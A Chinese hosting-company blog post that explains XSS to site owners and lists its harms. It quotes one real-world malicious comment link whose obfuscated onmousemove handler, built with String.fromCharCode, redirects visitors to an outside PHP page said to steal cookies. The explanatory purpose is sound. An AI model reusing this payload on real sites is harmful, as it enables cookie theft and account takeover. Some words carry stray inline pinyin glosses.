站長(zhǎng)朋友們?cè)诮ㄕ镜臅r(shí)候，想必都會(huì)遇到過這類JS腳本漏洞的問題，無憂主機(jī)小編在此先介紹一下XSS是什么，跨站腳本攻擊漏洞，ss表示（Site?Script）；由于這種漏洞的危害性很大，容易讓黑客們鉆空子，導(dǎo)致網(wǎng)站陷入面臨倒閉的境地，于是小編索羅了有關(guān)XSS跨站腳本漏洞容易導(dǎo)致的一些的危害以供參考： 1.釣魚欺騙：最典型的就是利用目標(biāo)網(wǎng)站的反射型跨站腳本漏洞將目標(biāo)網(wǎng)站重定向到釣魚網(wǎng)站，或者注入釣魚JavaScript以監(jiān)控目標(biāo)網(wǎng)站的表單輸入，甚至發(fā)起基于DHTML更高級(jí)的釣魚攻擊方式。 2.?網(wǎng)站掛馬：跨站后利用IFrame嵌入隱藏的惡意網(wǎng)站或者將被攻擊者定向到惡意網(wǎng)站上，或者彈出惡意網(wǎng)站窗口等方式都可以進(jìn)行掛馬攻擊。 3.身份盜用：Cookie是用戶對(duì)于特定網(wǎng)站的身份驗(yàn)證標(biāo)志，XSS可以盜取用戶的Cookie，從而利用該Cookie獲取用戶對(duì)該網(wǎng)站的操作權(quán)限。如果一個(gè)網(wǎng)站管理員用戶Cookie被竊取，將會(huì)對(duì)網(wǎng)站引發(fā)巨大的危害。 4.盜取網(wǎng)站用戶信息：當(dāng)能夠竊取到用戶Cookie從而獲取到用戶身份時(shí)，攻擊者可以獲取到用戶對(duì)網(wǎng)站的操作權(quán)限，從而查看用戶隱私信息。 5.垃圾信息發(fā)送：比如在SNS社區(qū)中，利用XSS漏洞借用被攻擊者的身份發(fā)送大量的垃圾信息給特定的目標(biāo)群體。 6.劫持用戶Web行為：一些高級(jí)的XSS攻擊甚至可以劫持用戶的Web行為，監(jiān)視用戶的瀏覽歷史，發(fā)送與接收的數(shù)據(jù)等等。 7.XSS蠕蟲：XSS?蠕蟲可以用來打廣告、刷流量、掛馬、惡作劇、破壞網(wǎng)上數(shù)據(jù)、實(shí)施DDoS攻擊等。   漏動(dòng)剖析： 在wordpress程序的評(píng)論列表中出現(xiàn)以下代碼：這段代碼的作用是獲取您本地的cookie值，也就相當(dāng)于您的網(wǎng)站后臺(tái)代碼被發(fā)這條鏈接的人獲取了； http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’?onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);

本文地址：http://www.gle-technology.com/wordpress/11760.html